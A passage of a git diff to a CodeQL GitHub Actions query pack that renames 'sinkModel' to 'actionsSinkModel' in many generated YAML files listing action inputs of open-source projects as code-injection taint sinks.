--- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] - ["shakacode/react-webpack-rails-tutorial", "*", "input.app_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 87e88b2c13d..8fca8591ceb 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index c0789d6e424..819728cf718 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] - ["slint-ui/slint", "*", "input.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index f617b9d172d..d3eaca780b4 100644 
--- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] - ["solidusio/solidus", "*", "input.labels", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index f30719d58d8..42c00ea216b 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index 84d5c96e63b..a93d6a039d4 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] - ["sonarr/sonarr", "*", "input.binary_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index d76ab136ab9..8a7784a6f01 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] - ["sonic-pi-net/sonic-pi", "*", "input.container-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 9e75660d1b3..1b22d43bfad 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index 1cc6e837b84..7175dd9450b 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index b2e283c6983..dca0f00a4ec 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] - ["spring-io/initializr", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index d08bdb5d6f4..5f75d4fd0cd 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] - ["spring-io/start.spring.io", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index 4532947bc48..d34a6a1a388 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-boot", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index 518a27d9afc..b7c5f7e214c 100644 
--- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-framework", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index bb21bcda68d..eead3b5ace3 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-graphql", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index 5f81d9bd406..be7043cfdbf 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] - ["square/workflow-kotlin", "*", "input.fix-task", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index f8fe2344d0a..36bdef9ad9a 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] - ["stefanprodan/podinfo", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index 377e439049c..3d66b07df9f 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 70b2c362464..2f8a3fbdfa6 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index 7f317ddad8e..e1acb54c724 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index b1a9ea20344..0a51c708799 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] - ["swagger-api/swagger-codegen", "*", "input.spec-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index 37e39efd243..0ee56c05777 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] - ["swagger-api/swagger-parser", "*", "input.parserSpecPath", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index 9569d47329f..f17216cf1e8 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] - ["tarantool/tarantool", "*", "input.chat-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index 6cf5dd84fbd..551010c6634 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index ce09307f8fb..bd64e336c17 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] - ["tensorflow/datasets", "*", "input.tf-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 183319e32ff..7d545451867 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index d8fb3f98b09..1ad4a2b824d 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] - ["toeverything/affine", "*", "input.nmHoistingLimits", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index c0c663e69f3..60381d41f16 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] - ["treeverse/lakefs", "*", "input.compose-directory", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index 35c0d80a115..ac61ed797d5 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] - ["trezor/trezor-firmware", "*", "input.model", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index dc1dcff0b15..7eed41f755e 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] - ["tribler/tribler", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index 2da63c894fc..f977f6a5cce 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] - ["trunk-io/trunk-action", "*", "input.post-init", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index 3dc87b3ed76..c4bacdc9c2c 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index 94a140a9fe1..f4ee4920797 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index d8f78274623..5fae95e5def 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index f539135bba0..4115d6c98f7 100644 --- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] - ["vesoft-inc/nebula", "*", "input.bucket", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index cc8a7f16492..536b37131c1 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] - ["vkcom/vkui", "*", "input.package_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index ec1ed14fed5..54f72118d87 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] - ["vuetifyjs/vuetify", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index 18b37d3c658..bed9ae53110 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index c1699ec6816..7e9f4e14e85 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] - ["walletconnect/walletconnectswiftv2", "*", "input.project-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 0fe9b73b6de..3a16fc74bb6 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] - ["wazuh/wazuh", "*", "input.doxygen_config", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index 27a5defa298..686f1013dd8 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] - ["web-infra-dev/rspack", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index 05fd2667812..6a6cb61c174 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 5a91e3cd32f..513cd4d7644 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index bb632423a1c..2855a6d4e01 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] - ["xrplf/rippled", "*", "input.cmake-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index dca76acdc27..78a2cc4e0ce 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] - ["zcash/zcash", "*", "input.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index c0e357715de..8db73d2fc77 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index 2bc23972e78..8b0deda070d 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] - ["zeroc-ice/ice", "*", "input.make_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 740bfd26d69..3f7a7e7fda8 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index f3bfa556ee5..9746a118691 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index f8c4e3c68be..6208645b1b7 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml 
